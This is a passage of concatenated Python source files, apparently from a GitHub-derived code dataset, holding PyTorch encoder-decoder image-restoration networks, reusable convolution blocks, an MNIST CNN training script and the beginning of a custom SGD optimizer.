out = F.relu(F.interpolate(self.decoder5(out),scale_factor=(2,2),mode ='bilinear'))
# print(out.shape)
# out = self.soft(out)
return self.tan(out)
class OUCD_lite(nn.Module):
def __init__(self):
super(OUCD_lite, self).__init__()
self.encoder1 = nn.Conv2d(3, 32, 3, stride=1, padding=1) # b, 16, 10, 10
self.bne1 = nn.InstanceNorm2d(32)
self.encoder2= nn.Conv2d(32, 64, 3, stride=1, padding=1) # b, 8, 3, 3
self.bne2 = nn.InstanceNorm2d(64)
self.encoder3= nn.Conv2d(64, 128, 3, stride=1, padding=1)
self.bne3 = nn.InstanceNorm2d(128)
self.encoder4= nn.Conv2d(128, 256, 3, stride=1, padding=1)
self.encoder5= nn.Conv2d(256, 512, 3, stride=1, padding=1)
self.encoder6= nn.Conv2d(512, 1024, 3, stride=1, padding=1)
self.decoder1= nn.Conv2d(1024,512, 3, stride=1, padding=1)
self.decoder2 = nn.Conv2d(512, 256, 3, stride=1, padding=1) # b, 1, 28, 28
self.bnd1 = nn.InstanceNorm2d(64)
self.decoder3 = nn.Conv2d(256, 128, 3, stride=1, padding=1)
self.bnd2 = nn.InstanceNorm2d(32)
self.decoder4 = nn.Conv2d(128, 64, 3, stride=1, padding=1)
self.bnd3 = nn.InstanceNorm2d(16)
self.decoder5 = nn.Conv2d(64, 32, 3, stride=1, padding=1)
self.decoder6 = nn.Conv2d(32, 16, 3, stride=1, padding=1)
# self.encoder5= nn.Conv2d(512, 1024, 3, stride=1, padding=1)
self.decoderf1 = nn.Conv2d(128, 64, 3, stride=1, padding=1)
self.bndf1 = nn.InstanceNorm2d(64)
self.decoderf2= nn.Conv2d(64, 32, 3, stride=1, padding=1)
self.bndf2 = nn.InstanceNorm2d(32)
self.decoderf3 = nn.Conv2d(32, 16, 3, stride=1, padding=1)
self.bndf3 = nn.InstanceNorm2d(16)
self.decoderf4 = nn.Conv2d(16, 16, 3, stride=1, padding=1)
self.decoderf5 = nn.Conv2d(16, 16, 3, stride=1, padding=1)
self.encoderf1 = nn.Conv2d(3, 32, 3, stride=1, padding=1)
self.bnef1 = nn.InstanceNorm2d(32)
self.encoderf2= nn.Conv2d(32, 64, 3, stride=1, padding=1)
self.bnef2 = nn.InstanceNorm2d(64)
self.encoderf3 = nn.Conv2d(64, 128, 3, stride=1, padding=1)
self.bnef3 = nn.InstanceNorm2d(128)
self.encoderf4 = nn.Conv2d(128, 128, 3, stride=1, padding=1)
self.encoderf5 = nn.Conv2d(128, 128, 3, stride=1, padding=1)
self.final = nn.Conv2d(16,3,1,stride=1,padding=0)
self.bnf = nn.InstanceNorm2d(3)
self.tmp1 = nn.Conv2d(64,32,1,stride=1,padding=0)
self.bnt1 = nn.InstanceNorm2d(32)
self.tmp2 = nn.Conv2d(128,32,1,stride=1,padding=0)
# self.bnt2 = nn.BatchNorm2d(32)
self.tmp3 = nn.Conv2d(64,32,1,stride=1,padding=0)
self.tmpf3 = nn.Conv2d(128,32,1,stride=1,padding=0)
self.tmpf2 = nn.Conv2d(64,32,1,stride=1,padding=0)
self.tan = nn.Tanh()
# self.soft = nn.Softmax(dim =1)
def forward(self, x):
out1 = F.relu(F.interpolate(self.encoderf1(x),scale_factor=(2,2),mode ='bilinear'))
t1 = F.interpolate(out1,scale_factor=(0.25,0.25),mode ='bilinear')
o1 = out1
out1 = F.relu(F.interpolate(self.encoderf2(out1),scale_factor=(2,2),mode ='bilinear'))
t2 = F.interpolate(out1,scale_factor=(0.125,0.125),mode ='bilinear')
o2 = out1
out1 = F.relu(F.interpolate(self.encoderf3(out1),scale_factor=(2,2),mode ='bilinear'))
t3 = F.interpolate(out1,scale_factor=(0.0625,0.0625),mode ='bilinear')
# U-NET encoder start
out = F.relu(F.max_pool2d(self.encoder1(x),2,2))
#Fusing all feature maps from K-NET
out = torch.add(out,torch.add(self.tmp2(t3),torch.add(t1,self.tmp1(t2))))
u1 = out
out = F.relu(F.max_pool2d(self.encoder2(out),2,2))
u2 = out
out = F.relu(F.max_pool2d(self.encoder3(out),2,2))
u3=out
out = F.relu(F.max_pool2d(self.encoder4(out),2,2))
u4=out
out = F.relu(F.max_pool2d(self.encoder5(out),2,2))
u5 = out
out = F.relu(F.max_pool2d(self.encoder6(out),2,2))
out = F.relu(F.interpolate(self.decoder1(out),scale_factor=(2,2),mode ='bilinear'))
out = torch.add(out,u5)
out = F.relu(F.interpolate(self.decoder2(out),scale_factor=(2,2),mode ='bilinear'))
out = torch.add(out,u4)
out = F.relu(F.interpolate(self.decoder3(out),scale_factor=(2,2),mode ='bilinear'))
out = torch.add(out,u3)
out = F.relu(F.interpolate(self.decoder4(out),scale_factor=(2,2),mode ='bilinear'))
out = torch.add(out,u2)
out = F.relu(F.interpolate(self.decoder5(out),scale_factor=(2,2),mode ='bilinear'))
out = torch.add(out,u1)
# out = F.relu(F.interpolate(self.decoder6(out),scale_factor=(2,2),mode ='bilinear'))
out1 = F.relu(F.max_pool2d(self.decoderf1(out1),2,2))
out1 = torch.add(out1,o2)
t2 = F.interpolate(out1,scale_factor=(0.125,0.125),mode ='bilinear')
out1 = F.relu(F.max_pool2d(self.decoderf2(out1),2,2))
out1 = torch.add(out1,o1)
t1 = F.interpolate(out1,scale_factor=(0.25,0.25),mode ='bilinear')
out1 = F.relu(F.max_pool2d(self.decoderf3(out1),2,2))
# Fusing all layers at the last layer of decoder
# print(out.shape,t1.shape,t2.shape,t3.shape)
out = torch.add(out,torch.add(self.tmpf3(t3),torch.add(t1,self.tmpf2(t2))))
out = F.relu(F.interpolate(self.decoder6(out),scale_factor=(2,2),mode ='bilinear'))
out = F.relu(self.final(out))
return self.tan(out)
class OUCD(nn.Module):
def __init__(self):
super(OUCD, self).__init__()
self.encoder1 = nn.Conv2d(3, 32, 3, stride=1, padding=1) # b, 16, 10, 10
self.bne1 = nn.InstanceNorm2d(32)
self.encoder2= nn.Conv2d(32, 64, 3, stride=1, padding=1) # b, 8, 3, 3
self.bne2 = nn.InstanceNorm2d(64)
self.encoder3= nn.Conv2d(64, 128, 3, stride=1, padding=1)
self.bne3 = nn.InstanceNorm2d(128)
self.encoder4= nn.Conv2d(128, 512, 3, stride=1, padding=1)
self.encoder5= nn.Conv2d(512, 1024, 3, stride=1, padding=1)
self.decoder1 = nn.Conv2d(1024, 512, 3, stride=1, padding=1) # b, 1, 28, 28
self.bnd1 = nn.InstanceNorm2d(64)
self.decoder2 = nn.Conv2d(512, 128, 3, stride=1, padding=1)
self.bnd2 = nn.InstanceNorm2d(32)
self.decoder3 = nn.Conv2d(128, 64, 3, stride=1, padding=1)
self.bnd3 = nn.InstanceNorm2d(16)
self.decoder4 = nn.Conv2d(64, 32, 3, stride=1, padding=1)
self.decoder5 = nn.Conv2d(32, 16, 3, stride=1, padding=1)
# self.decoderf1 = nn.Conv2d(16, 128, 2, stride=1, padding=1)
self.decoderf1 = nn.Conv2d(128, 64, 3, stride=1, padding=1)
self.bndf1 = nn.InstanceNorm2d(64)
self.decoderf2= nn.Conv2d(64, 32, 3, stride=1, padding=1)
self.bndf2 = nn.InstanceNorm2d(32)
self.decoderf3 = nn.Conv2d(32, 16, 3, stride=1, padding=1)
self.bndf3 = nn.InstanceNorm2d(16)
self.decoderf5 = nn.Conv2d(16, 16, 3, stride=1, padding=1)
# self.decoderf5 = nn.Conv2d(16, 16, 3, stride=1, padding=1)
self.encoderf1 = nn.Conv2d(3, 32, 3, stride=1, padding=1)
self.bnef1 = nn.InstanceNorm2d(32)
self.encoderf2= nn.Conv2d(32, 64, 3, stride=1, padding=1)
self.bnef2 = nn.InstanceNorm2d(64)
self.encoderf3 = nn.Conv2d(64, 128, 3, stride=1, padding=1)
self.bnef3 = nn.InstanceNorm2d(128)
self.encoderf4 = nn.Conv2d(128, 16, 3, stride=1, padding=1)
# self.encoderf5 = nn.Conv2d(128, 128, 3, stride=1, padding=1)
self.final = nn.Conv2d(16,3,1,stride=1,padding=0)
self.bnf = nn.InstanceNorm2d(3)
self.tmp1 = nn.Conv2d(16,32,1,stride=1,padding=0)
self.bnt1 = nn.InstanceNorm2d(32)
self.tmp2 = nn.Conv2d(32,32,1,stride=1,padding=0)
# self.bnt2 = nn.BatchNorm2d(32)
self.tmp3 = nn.Conv2d(64,32,1,stride=1,padding=0)
self.tmp4 = nn.Conv2d(16,32,1,stride=1,padding=0)
self.tmpf3 = nn.Conv2d(128,32,1,stride=1,padding=0)
self.tmpf2 = nn.Conv2d(64,32,1,stride=1,padding=0)
self.tmpf1 = nn.Conv2d(32,32,1,stride=1,padding=0)
self.tan = nn.Tanh()
self.sigmoid = nn.Sigmoid()
# self.soft = nn.Softmax(dim =1)
def forward(self, x):
out1 = F.relu(F.interpolate(self.encoderf1(x),scale_factor=(2,2),mode ='bilinear'))
t1 = F.interpolate(out1,scale_factor=(0.25,0.25),mode ='bilinear')
o1 = out1
out1 = F.relu(F.interpolate(self.encoderf2(out1),scale_factor=(2,2),mode ='bilinear'))
t2 = F.interpolate(out1,scale_factor=(0.125,0.125),mode ='bilinear')
o2 = out1
out1 = F.relu(F.interpolate(self.encoderf3(out1),scale_factor=(2,2),mode ='bilinear'))
t3 = F.interpolate(out1,scale_factor=(0.0625,0.0625),mode ='bilinear')
# U-NET encoder start
out = F.relu(F.max_pool2d(self.encoder1(x),2,2))
#Fusing all feature maps from K-NET
out = torch.add(out,torch.add(self.tmpf3(t3),torch.add(t1,self.tmpf2(t2))))
u1 = out
out = F.relu(F.max_pool2d(self.encoder2(out),2,2))
u2 = out
out = F.relu(F.max_pool2d(self.encoder3(out),2,2))
u3=out
out = F.relu(F.max_pool2d(self.encoder4(out),2,2))
u4=out
out = F.relu(F.max_pool2d(self.encoder5(out),2,2))
out = F.relu(F.interpolate(self.decoder1(out),scale_factor=(2,2),mode ='bilinear'))
out = torch.add(out,u4)
out = F.relu(F.interpolate(self.decoder2(out),scale_factor=(2,2),mode ='bilinear'))
out = torch.add(out,u3)
out = F.relu(F.interpolate(self.decoder3(out),scale_factor=(2,2),mode ='bilinear'))
out = torch.add(out,u2)
out = F.relu(F.interpolate(self.decoder4(out),scale_factor=(2,2),mode ='bilinear'))
out = torch.add(out,u1)
# Start K-Net decoder
out1 = F.relu(F.max_pool2d(self.decoderf1(out1),2,2))
out1 = torch.add(out1,o2)
t3 = F.interpolate(out1,scale_factor=(0.125,0.125),mode ='bilinear')
out1 = F.relu(F.max_pool2d(self.decoderf2(out1),2,2))
out1 = torch.add(out1,o1)
t2 = F.interpolate(out1,scale_factor=(0.25,0.25),mode ='bilinear')
out1 = F.relu(F.max_pool2d(self.decoderf3(out1),2,2))
t1 = F.interpolate(out1,scale_factor=(0.5,0.5),mode ='bilinear')
# Fusing all layers at the last layer of decoder
# print(t1.shape,t2.shape,t3.shape,out.shape)
out = torch.add(out,torch.add(self.tmp3(t3),torch.add(self.tmp1(t1),self.tmp2(t2))))
out = F.relu(F.interpolate(self.decoder5(out),scale_factor=(2,2),mode ='bilinear'))
out = torch.add(out,out1)
out = F.relu(self.final(out))
return self.tan(out)
class oucd_wo_msff_encoder(nn.Module):
def __init__(self):
super(oucd_wo_msff_encoder, self).__init__()
self.encoder1 = nn.Conv2d(3, 32, 3, stride=1, padding=1) # b, 16, 10, 10
self.bne1 = nn.InstanceNorm2d(32)
self.encoder2= nn.Conv2d(32, 64, 3, stride=1, padding=1) # b, 8, 3, 3
self.bne2 = nn.InstanceNorm2d(64)
self.encoder3= nn.Conv2d(64, 128, 3, stride=1, padding=1)
self.bne3 = nn.InstanceNorm2d(128)
self.encoder4= nn.Conv2d(128, 512, 3, stride=1, padding=1)
self.encoder5= nn.Conv2d(512, 1024, 3, stride=1, padding=1)
self.decoder1 = nn.Conv2d(1024, 512, 3, stride=1, padding=1) # b, 1, 28, 28
self.bnd1 = nn.InstanceNorm2d(64)
self.decoder2 = nn.Conv2d(512, 128, 3, stride=1, padding=1)
self.bnd2 = nn.InstanceNorm2d(32)
self.decoder3 = nn.Conv2d(128, 64, 3, stride=1, padding=1)
self.bnd3 = nn.InstanceNorm2d(16)
self.decoder4 = nn.Conv2d(64, 32, 3, stride=1, padding=1)
self.decoder5 = nn.Conv2d(32, 16, 3, stride=1, padding=1)
# self.decoderf1 = nn.Conv2d(16, 128, 2, stride=1, padding=1)
self.decoderf1 = nn.Conv2d(128, 64, 3, stride=1, padding=1)
self.bndf1 = nn.InstanceNorm2d(64)
self.decoderf2= nn.Conv2d(64, 32, 3, stride=1, padding=1)
self.bndf2 = nn.InstanceNorm2d(32)
self.decoderf3 = nn.Conv2d(32, 16, 3, stride=1, padding=1)
self.bndf3 = nn.InstanceNorm2d(16)
self.decoderf5 = nn.Conv2d(16, 16, 3, stride=1, padding=1)
# self.decoderf5 = nn.Conv2d(16, 16, 3, stride=1, padding=1)
self.encoderf1 = nn.Conv2d(3, 32, 3, stride=1, padding=1)
self.bnef1 = nn.InstanceNorm2d(32)
self.encoderf2= nn.Conv2d(32, 64, 3, stride=1, padding=1)
self.bnef2 = nn.InstanceNorm2d(64)
self.encoderf3 = nn.Conv2d(64, 128, 3, stride=1, padding=1)
self.bnef3 = nn.InstanceNorm2d(128)
self.encoderf4 = nn.Conv2d(128, 16, 3, stride=1, padding=1)
# self.encoderf5 = nn.Conv2d(128, 128, 3, stride=1, padding=1)
self.final = nn.Conv2d(16,3,1,stride=1,padding=0)
self.bnf = nn.InstanceNorm2d(3)
self.tmp1 = nn.Conv2d(16,32,1,stride=1,padding=0)
self.bnt1 = nn.InstanceNorm2d(32)
self.tmp2 = nn.Conv2d(32,32,1,stride=1,padding=0)
# self.bnt2 = nn.BatchNorm2d(32)
self.tmp3 = nn.Conv2d(64,32,1,stride=1,padding=0)
self.tmp4 = nn.Conv2d(16,32,1,stride=1,padding=0)
self.tmpf3 = nn.Conv2d(128,32,1,stride=1,padding=0)
self.tmpf2 = nn.Conv2d(64,32,1,stride=1,padding=0)
self.tmpf1 = nn.Conv2d(32,32,1,stride=1,padding=0)
self.tan = nn.Tanh()
self.sigmoid = nn.Sigmoid()
# self.soft = nn.Softmax(dim =1)
def forward(self, x):
out1 = F.relu(F.interpolate(self.encoderf1(x),scale_factor=(2,2),mode ='bilinear'))
# t1 = F.interpolate(out1,scale_factor=(0.25,0.25),mode ='bilinear')
o1 = out1
out1 = F.relu(F.interpolate(self.encoderf2(out1),scale_factor=(2,2),mode ='bilinear'))
# t2 = F.interpolate(out1,scale_factor=(0.125,0.125),mode ='bilinear')
o2 = out1
out1 = F.relu(F.interpolate(self.encoderf3(out1),scale_factor=(2,2),mode ='bilinear'))
# t3 = F.interpolate(out1,scale_factor=(0.0625,0.0625),mode ='bilinear')
# U-NET encoder start
out = F.relu(F.max_pool2d(self.encoder1(x),2,2))
#Fusing all feature maps from K-NET
# out = torch.add(out,torch.add(self.tmpf3(t3),torch.add(t1,self.tmpf2(t2))))
u1 = out
out = F.relu(F.max_pool2d(self.encoder2(out),2,2))
u2 = out
out = F.relu(F.max_pool2d(self.encoder3(out),2,2))
u3=out
out = F.relu(F.max_pool2d(self.encoder4(out),2,2))
u4=out
out = F.relu(F.max_pool2d(self.encoder5(out),2,2))
out = F.relu(F.interpolate(self.decoder1(out),scale_factor=(2,2),mode ='bilinear'))
out = torch.add(out,u4)
out = F.relu(F.interpolate(self.decoder2(out),scale_factor=(2,2),mode ='bilinear'))
out = torch.add(out,u3)
out = F.relu(F.interpolate(self.decoder3(out),scale_factor=(2,2),mode ='bilinear'))
out = torch.add(out,u2)
out = F.relu(F.interpolate(self.decoder4(out),scale_factor=(2,2),mode ='bilinear'))
out = torch.add(out,u1)
# Start K-Net decoder
out1 = F.relu(F.max_pool2d(self.decoderf1(out1),2,2))
out1 = torch.add(out1,o2)
t3 = F.interpolate(out1,scale_factor=(0.125,0.125),mode ='bilinear')
out1 = F.relu(F.max_pool2d(self.decoderf2(out1),2,2))
out1 = torch.add(out1,o1)
t2 = F.interpolate(out1,scale_factor=(0.25,0.25),mode ='bilinear')
out1 = F.relu(F.max_pool2d(self.decoderf3(out1),2,2))
t1 = F.interpolate(out1,scale_factor=(0.5,0.5),mode ='bilinear')
# Fusing all layers at the last layer of decoder
# print(t1.shape,t2.shape,t3.shape,out.shape)
out = torch.add(out,torch.add(self.tmp3(t3),torch.add(self.tmp1(t1),self.tmp2(t2))))
out = F.relu(F.interpolate(self.decoder5(out),scale_factor=(2,2),mode ='bilinear'))
out = torch.add(out,out1)
out = F.relu(self.final(out))
return self.tan(out)
```
|
{
"source": "jeya-maria-jose/On-The-Fly-Adaptation",
"score": 3
}
|
#### File: jeya-maria-jose/On-The-Fly-Adaptation/base_networks.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
import math
import torch
from torch import nn
from torch.nn import init
from torch.nn import functional as F
from torch.autograd import Function
from math import sqrt
import random
class ConvBlock(torch.nn.Module):
def __init__(self, input_size, output_size, kernel_size=3, stride=1, padding=1, bias=True, activation='prelu', norm=None):
super(ConvBlock, self).__init__()
self.conv = torch.nn.Conv2d(input_size, output_size, kernel_size, stride, padding, bias=bias)
self.norm = norm
if self.norm =='batch':
self.bn = torch.nn.BatchNorm2d(output_size)
elif self.norm == 'instance':
self.bn = torch.nn.InstanceNorm2d(output_size)
self.activation = activation
if self.activation == 'relu':
self.act = torch.nn.ReLU(True)
elif self.activation == 'prelu':
self.act = torch.nn.PReLU()
elif self.activation == 'lrelu':
self.act = torch.nn.LeakyReLU(0.2, True)
elif self.activation == 'tanh':
self.act = torch.nn.Tanh()
elif self.activation == 'sigmoid':
self.act = torch.nn.Sigmoid()
def forward(self, x):
if self.norm is not None:
out = self.bn(self.conv(x))
else:
out = self.conv(x)
if self.activation != 'no':
return self.act(out)
else:
return out
class DeconvBlock(torch.nn.Module):
def __init__(self, input_size, output_size, kernel_size=4, stride=2, padding=1, bias=True, activation='prelu', norm=None):
super(DeconvBlock, self).__init__()
self.deconv = torch.nn.ConvTranspose2d(input_size, output_size, kernel_size, stride, padding, bias=bias)
self.norm = norm
if self.norm == 'batch':
self.bn = torch.nn.BatchNorm2d(output_size)
elif self.norm == 'instance':
self.bn = torch.nn.InstanceNorm2d(output_size)
self.activation = activation
if self.activation == 'relu':
self.act = torch.nn.ReLU(True)
elif self.activation == 'prelu':
self.act = torch.nn.PReLU()
elif self.activation == 'lrelu':
self.act = torch.nn.LeakyReLU(0.2, True)
elif self.activation == 'tanh':
self.act = torch.nn.Tanh()
elif self.activation == 'sigmoid':
self.act = torch.nn.Sigmoid()
def forward(self, x):
if self.norm is not None:
out = self.bn(self.deconv(x))
else:
out = self.deconv(x)
if self.activation is not None:
return self.act(out)
else:
return out
class Decoder_MDCBlock1(torch.nn.Module):
def __init__(self, num_filter, num_ft, kernel_size=4, stride=2, padding=1, bias=True, activation='prelu', norm=None, mode='iter1'):
super(Decoder_MDCBlock1, self).__init__()
self.mode = mode
self.num_ft = num_ft - 1
self.down_convs = nn.ModuleList()
self.up_convs = nn.ModuleList()
for i in range(self.num_ft):
self.down_convs.append(
ConvBlock(num_filter*(2**i), num_filter*(2**(i+1)), kernel_size, stride, padding, bias, activation, norm=None)
)
self.up_convs.append(
DeconvBlock(num_filter*(2**(i+1)), num_filter*(2**i), kernel_size, stride, padding, bias, activation, norm=None)
)
def forward(self, ft_h, ft_l_list):
if self.mode == 'iter1' or self.mode == 'conv':
ft_h_list = []
for i in range(len(ft_l_list)):
ft_h_list.append(ft_h)
ft_h = self.down_convs[self.num_ft- len(ft_l_list) + i](ft_h)
ft_fusion = ft_h
for i in range(len(ft_l_list)):
ft_fusion = self.up_convs[self.num_ft-i-1](ft_fusion - ft_l_list[i]) + ft_h_list[len(ft_l_list)-i-1]
if self.mode == 'iter2':
ft_fusion = ft_h
for i in range(len(ft_l_list)):
ft = ft_fusion
for j in range(self.num_ft - i):
ft = self.down_convs[j](ft)
ft = ft - ft_l_list[i]
for j in range(self.num_ft - i):
ft = self.up_convs[self.num_ft - i - j - 1](ft)
ft_fusion = ft_fusion + ft
if self.mode == 'iter3':
ft_fusion = ft_h
for i in range(len(ft_l_list)):
ft = ft_fusion
for j in range(i+1):
ft = self.down_convs[j](ft)
ft = ft - ft_l_list[len(ft_l_list) - i - 1]
for j in range(i+1):
# print(j)
ft = self.up_convs[i + 1 - j - 1](ft)
ft_fusion = ft_fusion + ft
if self.mode == 'iter4':
ft_fusion = ft_h
for i in range(len(ft_l_list)):
ft = ft_h
for j in range(self.num_ft - i):
ft = self.down_convs[j](ft)
ft = ft - ft_l_list[i]
for j in range(self.num_ft - i):
ft = self.up_convs[self.num_ft - i - j - 1](ft)
ft_fusion = ft_fusion + ft
return ft_fusion
class Encoder_MDCBlock1(torch.nn.Module):
def __init__(self, num_filter, num_ft, kernel_size=4, stride=2, padding=1, bias=True, activation='prelu', norm=None, mode='iter1'):
super(Encoder_MDCBlock1, self).__init__()
self.mode = mode
self.num_ft = num_ft - 1
self.up_convs = nn.ModuleList()
self.down_convs = nn.ModuleList()
for i in range(self.num_ft):
self.up_convs.append(
DeconvBlock(num_filter//(2**i), num_filter//(2**(i+1)), kernel_size, stride, padding, bias, activation, norm=None)
)
self.down_convs.append(
ConvBlock(num_filter//(2**(i+1)), num_filter//(2**i), kernel_size, stride, padding, bias, activation, norm=None)
)
def forward(self, ft_l, ft_h_list):
if self.mode == 'iter1' or self.mode == 'conv':
ft_l_list = []
for i in range(len(ft_h_list)):
ft_l_list.append(ft_l)
ft_l = self.up_convs[self.num_ft- len(ft_h_list) + i](ft_l)
ft_fusion = ft_l
for i in range(len(ft_h_list)):
ft_fusion = self.down_convs[self.num_ft-i-1](ft_fusion - ft_h_list[i]) + ft_l_list[len(ft_h_list)-i-1]
if self.mode == 'iter2':
ft_fusion = ft_l
for i in range(len(ft_h_list)):
ft = ft_fusion
for j in range(self.num_ft - i):
ft = self.up_convs[j](ft)
ft = ft - ft_h_list[i]
for j in range(self.num_ft - i):
# print(j)
ft = self.down_convs[self.num_ft - i - j - 1](ft)
ft_fusion = ft_fusion + ft
if self.mode == 'iter3':
ft_fusion = ft_l
for i in range(len(ft_h_list)):
ft = ft_fusion
for j in range(i+1):
ft = self.up_convs[j](ft)
ft = ft - ft_h_list[len(ft_h_list) - i - 1]
for j in range(i+1):
# print(j)
ft = self.down_convs[i + 1 - j - 1](ft)
ft_fusion = ft_fusion + ft
if self.mode == 'iter4':
ft_fusion = ft_l
for i in range(len(ft_h_list)):
ft = ft_l
for j in range(self.num_ft - i):
ft = self.up_convs[j](ft)
ft = ft - ft_h_list[i]
for j in range(self.num_ft - i):
# print(j)
ft = self.down_convs[self.num_ft - i - j - 1](ft)
ft_fusion = ft_fusion + ft
return ft_fusion
# Residual dense block (RDB) architecture
class RDB(nn.Module):
def __init__(self, nChannels, nDenselayer, growthRate, scale = 1.0):
super(RDB, self).__init__()
nChannels_ = nChannels
self.scale = scale
modules = []
for i in range(nDenselayer):
modules.append(make_dense(nChannels_, growthRate))
nChannels_ += growthRate
self.dense_layers = nn.Sequential(*modules)
self.conv_1x1 = nn.Conv2d(nChannels_, nChannels, kernel_size=1, padding=0, bias=False)
def forward(self, x):
out = self.dense_layers(x)
out = self.conv_1x1(out) * self.scale
out = out + x
return out
class make_dense(nn.Module):
def __init__(self, nChannels, growthRate, kernel_size=3):
super(make_dense, self).__init__()
self.conv = nn.Conv2d(nChannels, growthRate, kernel_size=kernel_size, padding=(kernel_size-1)//2, bias=False)
def forward(self, x):
out = F.relu(self.conv(x))
out = torch.cat((x, out), 1)
return out
class ConvLayer(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, stride, padding):
super(ConvLayer, self).__init__()
# reflection_padding = kernel_size // 2
# self.reflection_pad = nn.ReflectionPad2d(reflection_padding)
self.conv2d = nn.Conv2d(in_channels, out_channels, kernel_size, stride, padding)
def forward(self, x):
# out = self.reflection_pad(x)
out = self.conv2d(x)
return out
class UpsampleConvLayer(torch.nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, stride):
super(UpsampleConvLayer, self).__init__()
self.conv2d = nn.ConvTranspose2d(in_channels, out_channels, kernel_size, stride=stride, padding=1)
def forward(self, x):
out = self.conv2d(x)
return out
class ResidualBlock(torch.nn.Module):
def __init__(self, channels):
super(ResidualBlock, self).__init__()
self.conv1 = ConvLayer(channels, channels, kernel_size=3, stride=1, padding=1)
self.conv2 = ConvLayer(channels, channels, kernel_size=3, stride=1, padding=1)
self.relu = nn.ReLU()
def forward(self, x):
residual = x
out = self.relu(self.conv1(x))
out = self.conv2(out) * 0.1
out = torch.add(out, residual)
return out
def init_linear(linear):
init.xavier_normal(linear.weight)
linear.bias.data.zero_()
def init_conv(conv, glu=True):
init.kaiming_normal(conv.weight)
if conv.bias is not None:
conv.bias.data.zero_()
class EqualLR:
def __init__(self, name):
self.name = name
def compute_weight(self, module):
weight = getattr(module, self.name + '_orig')
fan_in = weight.data.size(1) * weight.data[0][0].numel()
return weight * sqrt(2 / fan_in)
@staticmethod
def apply(module, name):
fn = EqualLR(name)
weight = getattr(module, name)
del module._parameters[name]
module.register_parameter(name + '_orig', nn.Parameter(weight.data))
module.register_forward_pre_hook(fn)
return fn
def __call__(self, module, input):
weight = self.compute_weight(module)
setattr(module, self.name, weight)
def equal_lr(module, name='weight'):
EqualLR.apply(module, name)
return module
```
|
{
"source": "jeya-maria-jose/sparseSGD",
"score": 3
}
|
#### File: jeya-maria-jose/sparseSGD/convolution_network.py
```python
import torch
from torch import nn, optim
import torch.nn.functional as F
from torch.autograd import Variable
from torch.utils.data import DataLoader
from torchvision import transforms
from torchvision import datasets
from logger import Logger
batch_size = 128
learning_rate = 1e-2
num_epoches = 20
def to_np(x):
return x.cpu().data.numpy()
train_dataset = datasets.MNIST(
root='./data', train=True, transform=transforms.ToTensor(), download=True)
test_dataset = datasets.MNIST(
root='./data', train=False, transform=transforms.ToTensor())
train_loader = DataLoader(train_dataset, batch_size=batch_size, shuffle=True)
test_loader = DataLoader(test_dataset, batch_size=batch_size, shuffle=False)
class Cnn(nn.Module):
def __init__(self, in_dim, n_class):
super(Cnn, self).__init__()
self.conv = nn.Sequential(
nn.Conv2d(in_dim, 6, 3, stride=1, padding=1),
nn.ReLU(True),
nn.MaxPool2d(2, 2),
nn.Conv2d(6, 16, 5, stride=1, padding=0),
nn.ReLU(True), nn.MaxPool2d(2, 2))
self.fc = nn.Sequential(
nn.Linear(400, 120), nn.Linear(120, 84), nn.Linear(84, n_class))
def forward(self, x):
out = self.conv(x)
out = out.view(out.size(0), -1)
out = self.fc(out)
return out
model = Cnn(1, 10)
use_gpu = torch.cuda.is_available()
if use_gpu:
model = model.cuda()
criterion = nn.CrossEntropyLoss()
optimizer = optim.SGD(model.parameters(), lr=learning_rate)
logger = Logger('./logs')
for epoch in range(num_epoches):
print('epoch {}'.format(epoch + 1))
print('*' * 10)
running_loss = 0.0
running_acc = 0.0
for i, data in enumerate(train_loader, 1):
img, label = data
if use_gpu:
img = img.cuda()
label = label.cuda()
img = Variable(img)
label = Variable(label)
out = model(img)
loss = criterion(out, label)
running_loss += loss.data * label.size(0)
_, pred = torch.max(out, 1)
num_correct = (pred == label).sum()
accuracy = (pred == label).float().mean()
running_acc += num_correct.data
optimizer.zero_grad()
loss.backward()
optimizer.step()
# ========================= Log ======================
step = epoch * len(train_loader) + i
# (1) Log the scalar values
info = {'loss': loss.data, 'accuracy': accuracy.data}
for tag, value in info.items():
logger.scalar_summary(tag, value, step)
# (2) Log values and gradients of the parameters (histogram)
for tag, value in model.named_parameters():
tag = tag.replace('.', '/')
logger.histo_summary(tag, to_np(value), step)
logger.histo_summary(tag + '/grad', to_np(value.grad), step)
# (3) Log the images
info = {'images': to_np(img.view(-1, 28, 28)[:10])}
for tag, images in info.items():
logger.image_summary(tag, images, step)
if i % 300 == 0:
print('[{}/{}] Loss: {:.6f}, Acc: {:.6f}'.format(
epoch + 1, num_epoches, running_loss / (batch_size * i),
running_acc / (batch_size * i)))
print('Finish {} epoch, Loss: {:.6f}, Acc: {:.6f}'.format(
epoch + 1, running_loss / (len(train_dataset)), running_acc / (len(
train_dataset))))
model.eval()
eval_loss = 0
eval_acc = 0
for data in test_loader:
img, label = data
if use_gpu:
img = Variable(img, volatile=True).cuda()
label = Variable(label, volatile=True).cuda()
else:
img = Variable(img, volatile=True)
label = Variable(label, volatile=True)
out = model(img)
loss = criterion(out, label)
eval_loss += loss.data * label.size(0)
_, pred = torch.max(out, 1)
num_correct = (pred == label).sum()
eval_acc += num_correct.data
print('Test Loss: {:.6f}, Acc: {:.6f}'.format(eval_loss / (len(
test_dataset)), eval_acc / (len(test_dataset))))
print()
torch.save(model.state_dict(), './cnn.pth')
```
#### File: jeya-maria-jose/sparseSGD/optimnewcpu.py
```python
import torch
from torch.optim import Optimizer
import numpy as np
import pdb
class _RequiredParameter(object):
"""Singleton class representing a required parameter for an Optimizer."""
def __repr__(self):
return "<required parameter>"
required = _RequiredParameter()
class SGD(Optimizer):
r"""Implements stochastic gradient descent (optionally with momentum).
Nesterov momentum is based on the formula from
`On the importance of initialization and momentum in deep learning`__.
Args:
params (iterable): iterable of parameters to optimize or dicts defining
parameter groups
lr (float): learning rate
momentum (float, optional): momentum factor (default: 0)
weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
dampening (float, optional): dampening for momentum (default: 0)
nesterov (bool, optional): enables Nesterov momentum (default: False)
Example:
>>> optimizer = torch.optim.SGD(model.parameters(), lr=0.1, momentum=0.9)
>>> optimizer.zero_grad()
>>> loss_fn(model(input), target).backward()
>>> optimizer.step()
__ http://www.cs.toronto.edu/%7Ehinton/absps/momentum.pdf
.. note::
The implementation of SGD with Momentum/Nesterov subtly differs from
Sutskever et. al. and implementations in some other frameworks.
Considering the specific case of Momentum, the update can be written as
.. math::
